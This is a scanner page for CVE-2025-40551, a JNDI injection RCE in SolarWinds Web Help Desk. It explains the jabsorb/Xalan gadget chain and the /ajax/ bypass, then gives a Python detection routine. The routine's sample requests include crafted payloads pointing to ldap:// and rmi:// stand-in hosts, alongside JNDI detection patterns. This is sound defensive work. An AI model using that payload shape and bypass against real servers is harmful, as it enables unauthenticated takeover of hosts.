
CVE-2025-40551 Scanner

CVE-2025-40551 Scanner - JNDI Injection RCE vulnerability in SolarWinds Web Help Desk

Short Info

Level: Critical
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 1 week 23 hours
Scan only one: URL

SolarWinds Web Help Desk is a comprehensive help desk software used by IT departments and service providers to manage support tickets, assets, and knowledge bases. It allows seamless tracking and prioritizing of service requests, automating ticketing processes, and offers customizable reporting features. Typically used by enterprises and educational institutions, it streamlines IT service management operations and improves visibility into IT processes. The software supports a multi-department setup and integrates with other SolarWinds products for enhanced functionality. SolarWinds Web Help Desk helps in reducing downtime and improving response rates with its efficient ticket management. Its user-friendly web interface makes it accessible for growing businesses requiring centralized service request management.

The JNDI injection vulnerability in SolarWinds Web Help Desk can lead to remote code execution. It stems from an insecure deserialization flaw in the jabsorb JSON-RPC library, which lets an attacker have the application instantiate the Apache Xalan JNDIConnectionPool class and use it to perform a JNDI lookup against a server the attacker controls. An unauthenticated, remote attacker can send malicious payloads that bypass the existing CSRF whitelist, and switching the endpoint directory in the request path sidesteps several payload sanitization functions. The severity is amplified because exploitation requires neither user interaction nor authentication, and a successful exploit can compromise the entire host.

Technically, the attack targets the JSON-RPC endpoints used by SolarWinds Web Help Desk. Inserting the "/ajax/" segment into the request path bypasses the URI validation that would otherwise reject the request. The attacker then sends a crafted JSON payload that makes jabsorb deserialize an Apache Xalan JNDIConnectionPool object whose JNDI path points to an LDAP server under the attacker's control; when the application resolves that reference, attacker-supplied code runs on the server. The chain relies only on components already shipped with the product and defeats defenses that depend on endpoint-level sanitization.
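The chain above has a recognizable shape on the wire: a JSON-RPC body that names the Xalan pool class and carries a JNDI URL, often reached through a path containing "/ajax/". The following detection routine, added here as an illustration and not part of the S4E scanner, SolarWinds or jabsorb, runs over constructed (path, body) pairs as a reverse proxy or WAF might log them. It assumes that jabsorb marks the target class with a "javaClass" key, that the fully qualified class name is org.apache.xalan.lib.sql.JNDIConnectionPool (the page names only "JNDIConnectionPool"), and that request bodies are available; the endpoint paths, method names and the "jndiPath" key in the samples are constructed.

```python
"""Flag JNDI-injection attempts in JSON-RPC request bodies.

Added example for this page; it is neither the S4E scanner nor SolarWinds or
jabsorb code. Assumptions beyond the page: jabsorb names the target class in a
"javaClass" key, the Xalan pool class is org.apache.xalan.lib.sql.JNDIConnectionPool,
and the request body is available (reverse-proxy or WAF log). Paths, method
names and the "jndiPath" key in the samples are constructed.
"""
import json
import re
from dataclasses import dataclass, field
from typing import Any, Iterator, Optional

# Assumed fully qualified name; the page only names "JNDIConnectionPool".
SUSPECT_CLASSES = {"org.apache.xalan.lib.sql.JNDIConnectionPool"}
# Schemes a JNDI lookup will resolve against a remote server.
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop|dns)://[^\s\"'<>]+", re.IGNORECASE)
# The path segment the page describes as the URI-validation bypass.
AJAX_SEGMENT = re.compile(r"/ajax/", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)
    class_hit: bool = False      # a gadget class name was present
    ajax_bypass: bool = False    # request used the /ajax/ segment

    @property
    def confidence(self) -> str:
        # A JNDI URL alone may be legitimate ticket text; the gadget class makes it high.
        return "high" if self.class_hit else "low"


def _walk(node: Any) -> Iterator[tuple[Optional[str], Any]]:
    """Depth-first walk over parsed JSON, yielding (key, value) pairs."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield None, value
            yield from _walk(value)


def inspect_request(path: str, body: str) -> Optional[Finding]:
    """Return a Finding when the body carries JNDI-injection indicators, else None."""
    finding = Finding(path=path, ajax_bypass=bool(AJAX_SEGMENT.search(path)))
    try:
        parsed = json.loads(body)
    except ValueError:
        parsed = None  # truncated or malformed capture: fall back to raw text

    if parsed is not None:
        for key, value in _walk(parsed):
            if not isinstance(value, str):
                continue
            if key == "javaClass" and value in SUSPECT_CLASSES:
                finding.class_hit = True
                finding.reasons.append(f"javaClass={value}")
            elif JNDI_URL.search(value):
                finding.reasons.append(f"JNDI URL in {key or 'array element'}: {value}")
    else:
        # Invalid JSON still gets a substring scan so a cut-off capture is not missed.
        for cls in SUSPECT_CLASSES:
            if cls in body:
                finding.class_hit = True
                finding.reasons.append(f"{cls} referenced in unparseable body")
        for match in JNDI_URL.finditer(body):
            finding.reasons.append(f"JNDI URL in unparseable body: {match.group(0)}")

    return finding if finding.reasons else None


def scan_requests(requests) -> list:
    """Run inspect_request over (path, body) pairs and keep the hits."""
    return [f for f in (inspect_request(p, b) for p, b in requests) if f is not None]


# Constructed sample traffic, not captured data.
SAMPLE_REQUESTS = [
    # Ordinary jabsorb call: a boxed map argument, no JNDI material.
    ("/helpdesk/JSON-RPC",
     '{"id": 1, "method": "tickets.list", '
     '"params": [{"javaClass": "java.util.HashMap", "map": {"page": 1}}]}'),
    # Gadget class plus attacker LDAP URL, routed through the /ajax/ segment.
    ("/helpdesk/ajax/JSON-RPC",
     '{"id": 2, "method": "example.call", "params": [{"javaClass": '
     '"org.apache.xalan.lib.sql.JNDIConnectionPool", "jndiPath": "ldap://203.0.113.5:1389/a"}]}'),
    # Same shape, but the proxy truncated the body mid-string: invalid JSON.
    ("/helpdesk/JSON-RPC",
     '{"id": 3, "method": "example.call", "params": [{"javaClass": '
     '"org.apache.xalan.lib.sql.JNDIConnectionPool", "jndiPath": "rmi://198.51.100.7:1099/'),
]

if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f.confidence:4s} {f.path} ajax={f.ajax_bypass} {f.reasons}")
```

The class-name match is what makes a hit high confidence; a bare ldap:// or rmi:// string can appear in legitimate ticket or knowledge-base text, so it is reported at low confidence and is best correlated with the /ajax/ path flag and with outbound LDAP or RMI connections from the Web Help Desk host.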

When the JNDI Injection vulnerability in SolarWinds Web Help Desk is exploited, it can have severe consequences. Attackers may gain unauthorized access to the server hosting the application, leading to potential data exfiltration or system commandeering. The resultant code execution could allow attackers to deploy malware or pivot through connected systems, creating a larger security breach. Data integrity and confidentiality might be severely compromised, with attackers potentially manipulating or destroying data stored or processed by the software. Exploitation of this vulnerability could result in financial loss, reputational damage, and loss of customer trust for affected organizations.
